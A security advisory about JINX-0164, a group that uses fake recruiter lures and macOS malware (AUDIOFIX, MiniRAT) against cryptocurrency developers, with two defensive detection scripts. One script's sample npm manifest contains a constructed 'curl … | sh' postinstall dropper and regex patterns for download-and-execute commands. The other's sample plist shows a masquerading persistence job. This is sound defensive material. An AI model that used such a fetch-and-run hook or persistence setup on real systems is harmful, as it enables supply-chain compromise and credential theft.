Published on May 28, 2026
JINX-0164 Targets Cryptocurrency Firms with Fake Recruiter Lures and macOS Malware
Severity
Medium
Detail
Cybersecurity researchers have uncovered a financially motivated threat actor known as JINX-0164 targeting cryptocurrency companies and software developers using recruiter-themed social engineering attacks and custom macOS malware. The campaign primarily focuses on stealing cryptocurrency assets, compromising developer environments, and infiltrating CI/CD infrastructure.
The attackers impersonate recruiters using realistic LinkedIn profiles and approach victims with fake job opportunities or interview invitations. Victims are then directed to malicious teleconference websites designed to imitate legitimate meeting platforms. During the fake meeting setup, users are instructed to download a supposed software fix or audio driver update, which actually installs malware on their macOS devices.
The malware deployed in these attacks is a Python-based infostealer and remote access trojan called AUDIOFIX. The payload is downloaded through a bash script hosted on attacker-controlled domains disguised as Apple driver repositories. The malware supports both Intel and Apple Silicon systems and disguises itself as legitimate macOS system processes such as “coreaudiod” to avoid detection. Once installed, AUDIOFIX steals extensive sensitive information from infected systems, including:
- Browser credentials
- Password manager data
- iCloud Keychain files
- SSH keys
- Local administrator credentials
- Cryptocurrency wallet information
- Browser extension data
- Active Discord, Slack, and Telegram sessions
- Shell histories and configuration files
The malware also enables remote command execution, file manipulation, payload downloads, reconnaissance activities, and data exfiltration. Researchers observed the attackers moving laterally from compromised developer laptops into internal development environments and CI/CD systems, where they attempted to modify source code and compromise additional systems.
Another malware component linked to the campaign is MiniRAT, a Go-based backdoor previously distributed through a compromised npm package named “@velora-dex/sdk,” a legitimate decentralized finance (DeFi) toolkit. The malicious version downloaded shell scripts that deployed MiniRAT on macOS systems, enabling attackers to upload files, execute commands, and retrieve additional payloads.
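A trojanized point release of a dependency, as described above, most often runs its dropper from an npm lifecycle hook (preinstall, install, postinstall, prepare) before any application code executes, so the manifest is the first place to look. The following audit script is an added example written for this advisory, not code from the researchers or from the package in question; the package names, versions and the postinstall command in it are constructed placeholders, and the exact command used by the compromised "@velora-dex/sdk" release is not given in the report. It flags install-time hooks that download and pipe into a shell, decode blobs at runtime or launch an interpreter, and it diffs the hooks between two versions, since a hook that appears out of nowhere in a point release is the strongest single signal.

```python
import json
import re

# Lifecycle hooks npm runs automatically during "npm install" of a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command shapes typical of a dropper rather than of a build step.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads from the network"),
    (re.compile(r"\|\s*(ba|z|da)?sh\b"), "pipes into a shell"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "decodes base64 at runtime"),
    (re.compile(r"\bnode\s+(-e|--eval)\b"), "runs inline JavaScript"),
    # interpreter invoked as a command (start of line, or after && ; |), with an argument
    (re.compile(r"(^|&&|;|\|)\s*(python3?|osascript|sh|bash)\s+\S"), "launches an interpreter"),
    (re.compile(r"https?://"), "embeds a URL"),
]


def audit_scripts(package_json_text):
    """Return {hook: [reasons]} for install-time hooks whose command looks like a dropper."""
    scripts = json.loads(package_json_text).get("scripts") or {}
    findings = {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        reasons = [why for rx, why in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            findings[hook] = reasons
    return findings


def compare_versions(prev_text, new_text):
    """Return install-time hooks that are new or changed between two manifests."""
    prev = json.loads(prev_text).get("scripts") or {}
    new = json.loads(new_text).get("scripts") or {}
    return {h: new[h] for h in INSTALL_HOOKS if h in new and new[h] != prev.get(h)}


# Constructed sample manifests (placeholder package name and URL, not the real package
# or infrastructure from the report): a clean release and a trojanized point release.
CLEAN_PKG = json.dumps({
    "name": "@example-dex/sdk", "version": "2.4.0",
    "scripts": {"build": "tsc -p .", "test": "jest", "prepare": "npm run build"},
})
TROJANIZED_PKG = json.dumps({
    "name": "@example-dex/sdk", "version": "2.4.1",
    "scripts": {"build": "tsc -p .", "test": "jest", "prepare": "npm run build",
                "postinstall": "curl -fsSL https://driver-update.example/setup.sh | sh"},
})

if __name__ == "__main__":
    for name, text in (("2.4.0", CLEAN_PKG), ("2.4.1", TROJANIZED_PKG)):
        print(name, audit_scripts(text) or "no suspicious install hooks")
    print("hooks changed between releases:", compare_versions(CLEAN_PKG, TROJANIZED_PKG))
```

Run audit_scripts over every package.json under node_modules after a lockfile update, and pair it with npm's real ignore-scripts setting (`npm config set ignore-scripts true`) on developer and CI machines so that an install-time hook cannot run at all without an explicit opt-in.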
Researchers noted similarities between JINX-0164 and North Korean cryptocurrency-focused threat groups due to the use of recruiter lures, fake domains, VPN services, and developer targeting. However, no direct infrastructure overlap with known North Korean groups has been confirmed.
How?
- Attackers create fake recruiter profiles on LinkedIn and contact developers or employees working in cryptocurrency organizations.
- Victims are invited to join a virtual interview or meeting hosted on a fake teleconference website.
- During the session setup, users are prompted to download a fake software fix or audio driver update.
- A malicious bash script downloads the AUDIOFIX malware payload from attacker-controlled infrastructure.
- The malware installs itself as a disguised macOS process and establishes persistence using launchctl.
- AUDIOFIX steals credentials, wallet information, SSH keys, browser data, messaging sessions, and sensitive development files.
- Attackers use the stolen access to move laterally into development infrastructure and CI/CD systems.
- In some cases, malicious code is inserted into software packages or repositories to facilitate supply chain compromise and additional infections.
- MiniRAT and other payloads may be deployed to maintain persistent remote access and expand compromise within the victim environment.
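Two details in the chain above are directly huntable on an endpoint: the payload masquerades as a system process such as coreaudiod, and it persists through launchctl, which means a launchd job file on disk. The script below is an added example written for this advisory, not tooling from the researchers, and it assumes that on current macOS the genuine audio daemon is /usr/sbin/coreaudiod with its job under /System/Library; the two sample jobs embedded in it are constructed for illustration and are not indicators from the report. It parses launchd plists and flags jobs that borrow the coreaudiod name without running the real binary, carry an Apple-style label outside the system directory, point at user-writable paths, or start a script interpreter at login.

```python
import os
import plistlib
from pathlib import Path

# Directories launchd loads jobs from. The two under /Library need admin rights;
# ~/Library/LaunchAgents is writable by the logged-in user, so a user-level
# implant registered with "launchctl load" most often lands there.
LAUNCHD_DIRS = [
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    os.path.expanduser("~/Library/LaunchAgents"),
]
# Assumption: the genuine audio daemon is /usr/sbin/coreaudiod and its launchd job
# lives under /System/Library, never in a user-writable directory.
LEGIT_COREAUDIOD = "/usr/sbin/coreaudiod"
INTERPRETERS = {"python", "python3", "bash", "sh", "zsh", "osascript"}
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")


def program_of(job):
    """Executable launchd would run: Program takes precedence over ProgramArguments[0]."""
    if "Program" in job:
        return str(job["Program"])
    args = job.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def audit_job(path, job):
    """Apply masquerade and persistence heuristics to one parsed job; return reasons."""
    reasons = []
    label = str(job.get("Label", ""))
    prog = program_of(job)
    args = [str(a) for a in job.get("ProgramArguments") or []]
    text = " ".join([label, prog] + args).lower()
    # 1. Claims to be coreaudiod but does not execute the real daemon binary.
    if "coreaudiod" in text and prog != LEGIT_COREAUDIOD:
        reasons.append("references coreaudiod but runs %s" % (prog or "<none>"))
    # 2. Apple-style label registered outside Apple's own system directory.
    if label.startswith("com.apple.") and not path.startswith("/System/"):
        reasons.append("com.apple.* label in non-system location")
    # 3. Executable or script sitting in a path an unprivileged user can write.
    if any(p.startswith(USER_WRITABLE) for p in [prog] + args[1:]):
        reasons.append("executable or script in user-writable path")
    # 4. A script interpreter started at login/boot: how a Python RAT stays resident.
    if os.path.basename(prog) in INTERPRETERS and job.get("RunAtLoad"):
        reasons.append("interpreter %s with RunAtLoad" % os.path.basename(prog))
    return reasons


def audit_plists(plists):
    """plists maps path -> plist content (str or bytes). Returns [(path, label, reasons)]
    for flagged jobs only; unparseable files are reported rather than silently skipped."""
    findings = []
    for path, data in plists.items():
        raw = data if isinstance(data, bytes) else data.encode()
        try:
            job = plistlib.loads(raw)
        except Exception as exc:  # malformed XML, unknown format, etc.
            findings.append((path, "<unparseable>", ["plist failed to parse: %s" % exc]))
            continue
        reasons = audit_job(path, job)
        if reasons:
            findings.append((path, str(job.get("Label", "")), reasons))
    return findings


def audit_host(dirs=LAUNCHD_DIRS):
    """Live mode: read every .plist in the launchd directories of this Mac."""
    plists = {}
    for d in dirs:
        for p in Path(d).glob("*.plist"):
            try:
                plists[str(p)] = p.read_bytes()
            except OSError:
                pass
    return audit_plists(plists)


# Constructed sample jobs (illustrative, not indicators from the report): the real
# daemon's entry and a user-level agent that borrows its name to run a Python script.
SAMPLE_PLISTS = {
    "/System/Library/LaunchDaemons/com.apple.audio.coreaudiod.plist": """<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.audio.coreaudiod</string>
  <key>Program</key><string>/usr/sbin/coreaudiod</string>
</dict></plist>""",
    "/Users/dev/Library/LaunchAgents/com.apple.coreaudiod.plist": """<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.coreaudiod</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/python3</string>
    <string>/Users/dev/Library/Application Support/coreaudiod/coreaudiod.py</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

if __name__ == "__main__":
    for path, label, reasons in audit_plists(SAMPLE_PLISTS) + audit_host():
        print("%s [%s]\n  - %s" % (path, label, "\n  - ".join(reasons)))
```

The heuristics are deliberately independent so that a single match still surfaces the job; on a developer fleet the output belongs in the same queue as EDR alerts, and any hit under ~/Library/LaunchAgents on a machine with CI/CD credentials should trigger the credential rotation the report's lateral-movement findings imply.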
Conclusion
The JINX-0164 campaign demonstrates how threat actors are increasingly combining advanced social engineering with tailored malware to target cryptocurrency organizations and developers. By abusing trusted recruitment workflows and disguising malware as legitimate system updates, the attackers successfully compromise macOS systems and gain access to sensitive development infrastructure.
The campaign also highlights the growing risk of software supply chain attacks within the cryptocurrency ecosystem, where compromising a single developer or package can potentially impact many downstream users. Organizations should strengthen identity verification processes for recruitment interactions, monitor CI/CD environments closely, enforce strict access controls, and educate employees about social engineering techniques targeting developers and cryptocurrency platforms.
Source
https://thehackernews.com/2026/05/jinx-0164-targets-cryptocurrency-firms.html
